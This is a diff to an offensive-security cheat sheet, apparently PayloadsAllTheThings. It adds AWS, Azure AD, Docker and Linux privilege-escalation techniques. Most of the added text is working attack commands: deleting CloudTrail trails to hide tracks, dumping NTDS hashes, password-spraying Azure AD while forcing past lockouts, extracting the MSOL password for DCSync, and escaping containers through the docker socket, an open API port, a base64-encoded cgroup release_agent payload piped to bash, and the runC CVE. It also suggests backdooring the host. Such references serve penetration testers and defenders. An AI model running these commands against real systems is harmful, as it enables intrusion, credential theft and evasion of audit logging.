:warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken.
|
||||||
|
@ -456,6 +474,25 @@ Prerequisite:
|
||||||
14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
|
14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
|
||||||
|
|
||||||
|
|
||||||
|
## Disable CloudTrail
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$ aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
|
||||||
|
```
|
||||||
|
|
||||||
|
Disable monitoring of events from global services
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
|
||||||
|
```
|
||||||
|
|
||||||
|
Disable Cloud Trail on specific regions
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Cover tracks by obfuscating Cloudtrail logs and Guard Duty
|
## Cover tracks by obfuscating Cloudtrail logs and Guard Duty
|
||||||
|
|
||||||
:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.
|
:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.
|
||||||
|
@ -571,3 +608,4 @@ https://github.com/DenizParlak/Zeus
|
||||||
* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/)
|
* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/)
|
||||||
* [Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar - Aug 29, 2019 ](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed)
|
* [Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar - Aug 29, 2019 ](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed)
|
||||||
* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650)
|
* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650)
|
||||||
|
* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/)
|
|
@ -7,6 +7,8 @@
|
||||||
* [Azure Storage Account - Access](#azure-storage-account----access)
|
* [Azure Storage Account - Access](#azure-storage-account----access)
|
||||||
* [Azure AD vs Active Directory](#azure-ad-vs-active-directory)
|
* [Azure AD vs Active Directory](#azure-ad-vs-active-directory)
|
||||||
* [Azure AD - Enumeration](#azure-ad---enumeration)
|
* [Azure AD - Enumeration](#azure-ad---enumeration)
|
||||||
|
* [Azure AD - Password Spray](#azure-ad---password-spray)
|
||||||
|
* [Azure AD - Convert GUID to SID](#azure-ad---convert-guid-to-sid)
|
||||||
* [Azure AD - Sign in with a service principal](#azure-ad---sign-in-with-a-service-principal)
|
* [Azure AD - Sign in with a service principal](#azure-ad---sign-in-with-a-service-principal)
|
||||||
* [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction)
|
* [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction)
|
||||||
* [Azure AD Connect - MSOL Account's password and DCSync](#azure-ad-connect---msol-accounts-password-and-dcsync)
|
* [Azure AD Connect - MSOL Account's password and DCSync](#azure-ad-connect---msol-accounts-password-and-dcsync)
|
||||||
|
@ -28,8 +30,9 @@
|
||||||
$ git clone https://github.com/hausec/PowerZure
|
$ git clone https://github.com/hausec/PowerZure
|
||||||
$ ipmo .\PowerZure
|
$ ipmo .\PowerZure
|
||||||
$ Set-Subscription -Id [idgoeshere]
|
$ Set-Subscription -Id [idgoeshere]
|
||||||
|
|
||||||
# Reader
|
# Reader
|
||||||
$ Get-Runbook
|
$ Get-Runbook, Get-AllUsers, Get-Apps, Get-Resources, Get-WebApps, Get-WebAppDetails
|
||||||
|
|
||||||
# Contributor
|
# Contributor
|
||||||
$ Execute-Command -OS Windows -VM Win10Test -ResourceGroup Test-RG -Command "whoami"
|
$ Execute-Command -OS Windows -VM Win10Test -ResourceGroup Test-RG -Command "whoami"
|
||||||
|
@ -172,6 +175,21 @@ Found Container - hrsecure.blob.core.windows.net/NETSPItest
|
||||||
|
|
||||||
## Azure AD - Enumeration
|
## Azure AD - Enumeration
|
||||||
|
|
||||||
|
> By default it is possible to query almost all the information about the directory as authenticated user, even when the Azure portal is restricted, using Azure AD Graph.
|
||||||
|
|
||||||
|
Check if the compagny is using Azure AD with `https://login.microsoftonline.com/getuserrealm.srf?login=username@target.onmicrosoft.com&xml=1`.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$ git clone https://github.com/dirkjanm/ROADtools
|
||||||
|
$ pip install roadrecon
|
||||||
|
$ roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout]
|
||||||
|
$ roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa]
|
||||||
|
$ roadrecon dump
|
||||||
|
$ roadrecon gui
|
||||||
|
```
|
||||||
|
|
||||||
|
Can be used in BloodHound using the fork : https://github.com/dirkjanm/BloodHound-AzureAD
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
PS C:\> git clone https://github.com/adrecon/AzureADRecon.git
|
PS C:\> git clone https://github.com/adrecon/AzureADRecon.git
|
||||||
PS C:\> Install-Module -Name AzureAD
|
PS C:\> Install-Module -Name AzureAD
|
||||||
|
@ -187,6 +205,19 @@ PS C:\> .\AzureADRecon.ps1 -Credential $creds
|
||||||
PS C:\>.\AzureADRecon.ps1 -GenExcel C:\AzureADRecon-Report-<timestamp>
|
PS C:\>.\AzureADRecon.ps1 -GenExcel C:\AzureADRecon-Report-<timestamp>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Stormspotter, graphing Azure and Azure Active Directory objects
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$ docker run --name stormspotter -p7474:7474 -p7687:7687 -d --env NEO4J_AUTH=neo4j/[password] neo4j:3.5.18
|
||||||
|
git clone https://github.com/Azure/Stormspotter
|
||||||
|
cd Stormspotter
|
||||||
|
pipenv install .
|
||||||
|
stormspotter --cli
|
||||||
|
stormdash -dbu <neo4j-user> -dbp <neo4j-pass>
|
||||||
|
Browse to http://127.0.0.1:8050 to interact with the graph.
|
||||||
|
```
|
||||||
|
|
||||||
|
Other interesting commands to enumerate Azure AD.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# Azure AD powershell module
|
# Azure AD powershell module
|
||||||
|
@ -251,6 +282,7 @@ ForEach($role in $roles) {
|
||||||
$roleUsers
|
$roleUsers
|
||||||
|
|
||||||
### Enumeration using Microburst
|
### Enumeration using Microburst
|
||||||
|
git clone https://github.com/NetSPI/MicroBurst/blob/master/Get-AzureADDomainInfo.ps1
|
||||||
Import-Module .\MicroBurst.psm1
|
Import-Module .\MicroBurst.psm1
|
||||||
|
|
||||||
# Anonymous enumeration
|
# Anonymous enumeration
|
||||||
|
@ -258,6 +290,7 @@ Invoke-EnumerateAzureBlobs -Base company
|
||||||
Invoke-EnumerateAzureSubDomains -base company -verbose
|
Invoke-EnumerateAzureSubDomains -base company -verbose
|
||||||
|
|
||||||
# Authencticated enumeration
|
# Authencticated enumeration
|
||||||
|
Get-AzureADDomainInfo
|
||||||
Get-AzureDomainInfo -folder MicroBurst -VerboseGet-MSOLDomainInfo
|
Get-AzureDomainInfo -folder MicroBurst -VerboseGet-MSOLDomainInfo
|
||||||
Get-MSOLDomainInfo
|
Get-MSOLDomainInfo
|
||||||
```
|
```
|
||||||
|
@ -270,6 +303,34 @@ With Microsoft, if you are using any cloud services (Office 365, Exchange Online
|
||||||
3. Pick the account from the active sessions
|
3. Pick the account from the active sessions
|
||||||
4. Select Azure Active Directory and enjoy!
|
4. Select Azure Active Directory and enjoy!
|
||||||
|
|
||||||
|
## Azure AD - Password Spray
|
||||||
|
|
||||||
|
> Default lockout policy of 10 failed attempts, locking out an account for 60 seconds
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
git clone https://github.com/dafthack/MSOLSpray
|
||||||
|
Import-Module .\MSOLSpray.ps1
|
||||||
|
Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020
|
||||||
|
Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme!
|
||||||
|
|
||||||
|
# UserList - UserList file filled with usernames one-per-line in the format "user@domain.com"
|
||||||
|
# Password - A single password that will be used to perform the password spray.
|
||||||
|
# OutFile - A file to output valid results to.
|
||||||
|
# Force - Forces the spray to continue and not stop when multiple account lockouts are detected.
|
||||||
|
# URL - The URL to spray against. Potentially useful if pointing at an API Gateway URL generated with something like FireProx to randomize the IP address you are authenticating from.
|
||||||
|
```
|
||||||
|
|
||||||
|
## Azure AD - Convert GUID to SID
|
||||||
|
|
||||||
|
The user's AAD id is translated to SID by concatenating `"S-1–12–1-"` to the decimal representation of each section of the AAD Id.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)]
|
||||||
|
SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)]
|
||||||
|
```
|
||||||
|
|
||||||
|
For example, the representation of `6aa89ecb-1f8f-4d92–810d-b0dce30b6c82` is `S-1–12–1–1789435595–1301421967–3702525313–2188119011`
|
||||||
|
|
||||||
## Azure AD - Sign in with a service principal
|
## Azure AD - Sign in with a service principal
|
||||||
|
|
||||||
https://docs.microsoft.com/en-us/powershell/azure/authenticate-azureps?view=azps-3.3.0&viewFallbackFrom=azurermps-6.5.0#sign-in-with-a-service-principal
|
https://docs.microsoft.com/en-us/powershell/azure/authenticate-azureps?view=azps-3.3.0&viewFallbackFrom=azurermps-6.5.0#sign-in-with-a-service-principal
|
||||||
|
@ -313,7 +374,11 @@ Prerequisite:
|
||||||
* Compromise a server with Azure AD Connect service
|
* Compromise a server with Azure AD Connect service
|
||||||
* Access to ADSyncAdmins or local Administrators groups
|
* Access to ADSyncAdmins or local Administrators groups
|
||||||
|
|
||||||
Use the script **azuread_decrypt_msol.ps1** from @xpn : https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545#file-azuread_decrypt_msol-ps1 to recover the decrypted password for the MSOL account
|
Use the script **azuread_decrypt_msol.ps1** from @xpn to recover the decrypted password for the MSOL account:
|
||||||
|
* `azuread_decrypt_msol.ps1`: AD Connect Sync Credential Extract POC https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545
|
||||||
|
* `azuread_decrypt_msol_v2.ps1`: Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c
|
||||||
|
|
||||||
|
Now you can use the retrieved credentials for the MSOL Account to launch a DCSync attack.
|
||||||
|
|
||||||
## Azure AD Connect - Seamless Single Sign On Silver Ticket
|
## Azure AD Connect - Seamless Single Sign On Silver Ticket
|
||||||
|
|
||||||
|
@ -411,13 +476,14 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an
|
||||||
https://fws.domain.com/o365/visfed/intrdomain/se/?username=firstname.lastname%40domain.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=
|
https://fws.domain.com/o365/visfed/intrdomain/se/?username=firstname.lastname%40domain.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=
|
||||||
</AuthURL>
|
</AuthURL>
|
||||||
```
|
```
|
||||||
|
* Validate email : https://github.com/LMGsec/o365creeper `o365creeper.py -f emails.txt -o validemails.txt`
|
||||||
* Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon
|
* Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [An introduction to penetration testing Azure - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-azure/)
|
* [An introduction to penetration testing Azure - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-azure/)
|
||||||
* [Running POwershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)
|
* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)
|
||||||
* [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/)
|
* [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/)
|
||||||
* [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/)
|
* [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/)
|
||||||
* [Detecting an attacks on active directory with Azure - Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/)
|
* [Detecting an attacks on active directory with Azure - Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/)
|
||||||
|
@ -427,3 +493,8 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an
|
||||||
* [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a)
|
* [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a)
|
||||||
* [Azure AD connect for RedTeam - @xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/)
|
* [Azure AD connect for RedTeam - @xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/)
|
||||||
* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/)
|
* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/)
|
||||||
|
* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/)
|
||||||
|
* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/)
|
||||||
|
* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56)
|
||||||
|
* [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html)
|
||||||
|
* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
|
|
@ -0,0 +1,186 @@
|
||||||
|
# Docker Pentest
|
||||||
|
|
||||||
|
> Docker is a set of platform as a service (PaaS) products that uses OS-level virtualization to deliver software in packages called containers.
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
- [Tools](#tools)
|
||||||
|
- [Mounted Docker Socket](#mounted-docker-socket)
|
||||||
|
- [Open Docker API Port](#open-docker-api-port)
|
||||||
|
- [Insecure Docker Registry](#insecure-docker-registry)
|
||||||
|
- [Exploit privileged container abusing the Linux cgroup v1](#exploit-privileged-container-abusing-the-linux-cgroup-v1)
|
||||||
|
- [Breaking out of Docker via runC](#breaking-out-of-docker-via-runc)
|
||||||
|
- [Breaking out of containers using a device file](#breaking-out-of-containers-using-a-device-file)
|
||||||
|
- [References](#references)
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
* Dockscan : https://github.com/kost/dockscan
|
||||||
|
```powershell
|
||||||
|
dockscan unix:///var/run/docker.sock
|
||||||
|
dockscan -r html -o myreport -v tcp://example.com:5422
|
||||||
|
```
|
||||||
|
|
||||||
|
## Mounted Docker Socket
|
||||||
|
|
||||||
|
Prerequisite:
|
||||||
|
* Socker mounted as volume : `- "/var/run/docker.sock:/var/run/docker.sock"`
|
||||||
|
|
||||||
|
Usually found in `/var/run/docker.sock`, for example for Portainer.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
curl --unix-socket /var/run/docker.sock http://127.0.0.1/containers/json
|
||||||
|
curl -XPOST –unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Content-Type: application/json' http://localhost/containers/create
|
||||||
|
curl -XPOST –unix-socket /var/run/docker.sock http://localhost/containers/ID_FROM_PREVIOUS_COMMAND/start
|
||||||
|
```
|
||||||
|
|
||||||
|
Exploit using [brompwnie/ed](https://github.com/brompwnie/ed)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
root@37bb034797d1:/tmp# ./ed_linux_amd64 -path=/var/run/ -autopwn=true
|
||||||
|
[+] Hunt dem Socks
|
||||||
|
[+] Hunting Down UNIX Domain Sockets from: /var/run/
|
||||||
|
[*] Valid Socket: /var/run/docker.sock
|
||||||
|
[+] Attempting to autopwn
|
||||||
|
[+] Hunting Docker Socks
|
||||||
|
[+] Attempting to Autopwn: /var/run/docker.sock
|
||||||
|
[*] Getting Docker client...
|
||||||
|
[*] Successfully got Docker client...
|
||||||
|
[+] Attempting to escape to host...
|
||||||
|
[+] Attempting in TTY Mode
|
||||||
|
chroot /host && clear
|
||||||
|
echo 'You are now on the underlying host'
|
||||||
|
chroot /host && clear
|
||||||
|
echo 'You are now on the underlying host'
|
||||||
|
/ # chroot /host && clear
|
||||||
|
/ # echo 'You are now on the underlying host'
|
||||||
|
You are now on the underlying host
|
||||||
|
/ # id
|
||||||
|
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Open Docker API Port
|
||||||
|
|
||||||
|
Prerequisite:
|
||||||
|
* Docker runned with `-H tcp://0.0.0.0:XXXX`
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$ nmap -sCV 10.10.10.10 -p 2376
|
||||||
|
2376/tcp open docker Docker 19.03.5
|
||||||
|
| docker-version:
|
||||||
|
| Version: 19.03.5
|
||||||
|
| MinAPIVersion: 1.12
|
||||||
|
```
|
||||||
|
|
||||||
|
Mount the current system inside a new "temporary" Ubuntu container, you will gain root access to the filesystem in `/mnt`.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$ export DOCKER_HOST=tcp://10.10.10.10:2376
|
||||||
|
$ docker run --name ubuntu_bash --rm -i -v /:/mnt -u 0 -t ubuntu bash
|
||||||
|
or
|
||||||
|
$ docker -H open.docker.socket:2375 ps
|
||||||
|
$ docker -H open.docker.socket:2375 exec -it mysql /bin/bash
|
||||||
|
or
|
||||||
|
$ curl -s –insecure https://tls-opendocker.socket:2376/secrets | jq
|
||||||
|
$ curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}'
|
||||||
|
```
|
||||||
|
|
||||||
|
From there you can backdoor the filesystem by adding an ssh key in `/root/.ssh` or adding a new root user in `/etc/passwd`.
|
||||||
|
|
||||||
|
|
||||||
|
## Insecure Docker Registry
|
||||||
|
|
||||||
|
Docker Registry’s fingerprint is `Docker-Distribution-Api-Version` header. Then connect to Registry API endpoint: `/v2/_catalog`.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
curl https://registry.example.com/v2/<image_name>/tags/list
|
||||||
|
docker pull https://registry.example.com:443/<image_name>:<tag>
|
||||||
|
|
||||||
|
# connect to the endpoint and list image blobs
|
||||||
|
curl -s -k --user "admin:admin" https://docker.registry.local/v2/_catalog
|
||||||
|
curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/tags/list
|
||||||
|
curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/manifests/latest
|
||||||
|
# download blobs
|
||||||
|
curl -s -k --user 'admin:admin' 'http://docker.registry.local/v2/wordpress-image/blobs/sha256:c314c5effb61c9e9c534c81a6970590ef4697b8439ec6bb4ab277833f7315058' > out.tar.gz
|
||||||
|
# automated download
|
||||||
|
https://github.com/NotSoSecure/docker_fetch/
|
||||||
|
python /opt/docker_fetch/docker_image_fetch.py -u http://admin:admin@docker.registry.local
|
||||||
|
```
|
||||||
|
|
||||||
|
Access a private registry and start a container with one of its image
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
docker login -u admin -p admin docker.registry.local
|
||||||
|
docker pull docker.registry.local/wordpress-image
|
||||||
|
docker run -it docker.registry.local/wordpress-image /bin/bash
|
||||||
|
```
|
||||||
|
|
||||||
|
Access a private registry using OAuth Token from Google
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
curl http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/email
|
||||||
|
curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token
|
||||||
|
docker login -e <email> -u oauth2accesstoken -p "<access token>" https://gcr.io
|
||||||
|
```
|
||||||
|
|
||||||
|
## Exploit privileged container abusing the Linux cgroup v1
|
||||||
|
|
||||||
|
Prerequisite (at least one):
|
||||||
|
* `--privileged`
|
||||||
|
* `--security-opt apparmor=unconfined --cap-add=SYS_ADMIN` flags.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash -c 'echo "cm5kX2Rpcj0kKGRhdGUgKyVzIHwgbWQ1c3VtIHwgaGVhZCAtYyAxMCkKbWtkaXIgL3RtcC9jZ3JwICYmIG1vdW50IC10IGNncm91cCAtbyByZG1hIGNncm91cCAvdG1wL2NncnAgJiYgbWtkaXIgL3RtcC9jZ3JwLyR7cm5kX2Rpcn0KZWNobyAxID4gL3RtcC9jZ3JwLyR7cm5kX2Rpcn0vbm90aWZ5X29uX3JlbGVhc2UKaG9zdF9wYXRoPWBzZWQgLW4gJ3MvLipccGVyZGlyPVwoW14sXSpcKS4qL1wxL3AnIC9ldGMvbXRhYmAKZWNobyAiJGhvc3RfcGF0aC9jbWQiID4gL3RtcC9jZ3JwL3JlbGVhc2VfYWdlbnQKY2F0ID4gL2NtZCA8PCBfRU5ECiMhL2Jpbi9zaApjYXQgPiAvcnVubWUuc2ggPDwgRU9GCnNsZWVwIDMwIApFT0YKc2ggL3J1bm1lLnNoICYKc2xlZXAgNQppZmNvbmZpZyBldGgwID4gIiR7aG9zdF9wYXRofS9vdXRwdXQiCmhvc3RuYW1lID4+ICIke2hvc3RfcGF0aH0vb3V0cHV0IgppZCA+PiAiJHtob3N0X3BhdGh9L291dHB1dCIKcHMgYXh1IHwgZ3JlcCBydW5tZS5zaCA+PiAiJHtob3N0X3BhdGh9L291dHB1dCIKX0VORAoKIyMgTm93IHdlIHRyaWNrIHRoZSBkb2NrZXIgZGFlbW9uIHRvIGV4ZWN1dGUgdGhlIHNjcmlwdC4KY2htb2QgYSt4IC9jbWQKc2ggLWMgImVjaG8gXCRcJCA+IC90bXAvY2dycC8ke3JuZF9kaXJ9L2Nncm91cC5wcm9jcyIKIyMgV2FpaWlpaXQgZm9yIGl0Li4uCnNsZWVwIDYKY2F0IC9vdXRwdXQKZWNobyAi4oCiPygowq/CsMK3Ll8u4oCiIHByb2ZpdCEg4oCiLl8uwrfCsMKvKSnYn+KAoiIK" | base64 -d | bash -'
|
||||||
|
```
|
||||||
|
|
||||||
|
Exploit breakdown :
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# On the host
|
||||||
|
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
|
||||||
|
|
||||||
|
# In the container
|
||||||
|
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
|
||||||
|
|
||||||
|
echo 1 > /tmp/cgrp/x/notify_on_release
|
||||||
|
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
|
||||||
|
echo "$host_path/cmd" > /tmp/cgrp/release_agent
|
||||||
|
|
||||||
|
echo '#!/bin/sh' > /cmd
|
||||||
|
echo "ps aux > $host_path/output" >> /cmd
|
||||||
|
chmod a+x /cmd
|
||||||
|
|
||||||
|
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
||||||
|
```
|
||||||
|
|
||||||
|
## Breaking out of Docker via runC
|
||||||
|
|
||||||
|
> The vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command ... as root within a container in either of these contexts: Creating a new container using an attacker-controlled image. Attaching (docker exec) into an existing container which the attacker had previous write access to. - Vulnerability overview by the runC team
|
||||||
|
|
||||||
|
Exploit for CVE-2019-5736 : https://github.com/twistlock/RunC-CVE-2019-5736
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicious_image_POC
|
||||||
|
$ docker run --rm cve-2019-5736:malicious_image_POC
|
||||||
|
```
|
||||||
|
|
||||||
|
## Breaking out of containers using a device file
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
https://github.com/FSecureLABS/fdpasser
|
||||||
|
In container, as root: ./fdpasser recv /moo /etc/shadow
|
||||||
|
Outside container, as UID 1000: ./fdpasser send /proc/$(pgrep -f "sleep 1337")/root/moo
|
||||||
|
Outside container: ls -la /etc/shadow
|
||||||
|
Output: -rwsrwsrwx 1 root shadow 1209 Oct 10 2019 /etc/shadow
|
||||||
|
```
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
- [Hacking Docker Remotely - 17 March 2020 - ch0ks](https://hackarandas.com/blog/2020/03/17/hacking-docker-remotely/)
|
||||||
|
- [Understanding Docker container escapes - JULY 19, 2019 - Trail of Bits](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)
|
||||||
|
- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0)
|
||||||
|
- [Breaking out of Docker via runC – Explaining CVE-2019-5736 - Yuval Avrahami - February 21, 2019](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/)
|
||||||
|
- [CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host - dragonsector.pl](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html)
|
||||||
|
- [OWASP - Docker Security CheatSheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md)
|
||||||
|
- [Anatomy of a hack: Docker Registry - NotSoSecure - April 6, 2017](https://www.notsosecure.com/anatomy-of-a-hack-docker-registry/)
|
|
@ -10,6 +10,9 @@
|
||||||
* [Last edited files](#last-edited-files)
|
* [Last edited files](#last-edited-files)
|
||||||
* [In memory passwords](#in-memory-passwords)
|
* [In memory passwords](#in-memory-passwords)
|
||||||
* [Find sensitive files](#find-sensitive-files)
|
* [Find sensitive files](#find-sensitive-files)
|
||||||
|
* [SSH Key](#ssh-key)
|
||||||
|
* [Sensitive files](#sensitive-files)
|
||||||
|
* [SSH Key Predictable PRNG (Authorized_Keys) Process](#ssh-key-predictable-prng-authorized_keys-process)
|
||||||
* [Scheduled tasks](#scheduled-tasks)
|
* [Scheduled tasks](#scheduled-tasks)
|
||||||
* [Cron jobs](#cron-jobs)
|
* [Cron jobs](#cron-jobs)
|
||||||
* [Systemd timers](#systemd-timers)
|
* [Systemd timers](#systemd-timers)
|
||||||
|
@ -25,6 +28,7 @@
|
||||||
* [LD_PRELOAD and NOPASSWD](#ld_preload-and-nopasswd)
|
* [LD_PRELOAD and NOPASSWD](#ld_preload-and-nopasswd)
|
||||||
* [Doas](#doas)
|
* [Doas](#doas)
|
||||||
* [sudo_inject](#sudo-inject)
|
* [sudo_inject](#sudo-inject)
|
||||||
|
* [CVE-2019-14287](#cve-2019-14287)
|
||||||
* [GTFOBins](#gtfobins)
|
* [GTFOBins](#gtfobins)
|
||||||
* [Wildcard](#wildcard)
|
* [Wildcard](#wildcard)
|
||||||
* [Writable files](#writable-files)
|
* [Writable files](#writable-files)
|
||||||
|
@ -182,6 +186,61 @@ $ locate password | more
|
||||||
...
|
...
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## SSH Key
|
||||||
|
|
||||||
|
### Sensitive files
|
||||||
|
|
||||||
|
```
|
||||||
|
find / -name authorized_keys 2> /dev/null
|
||||||
|
find / -name id_rsa 2> /dev/null
|
||||||
|
...
|
||||||
|
```
|
||||||
|
|
||||||
|
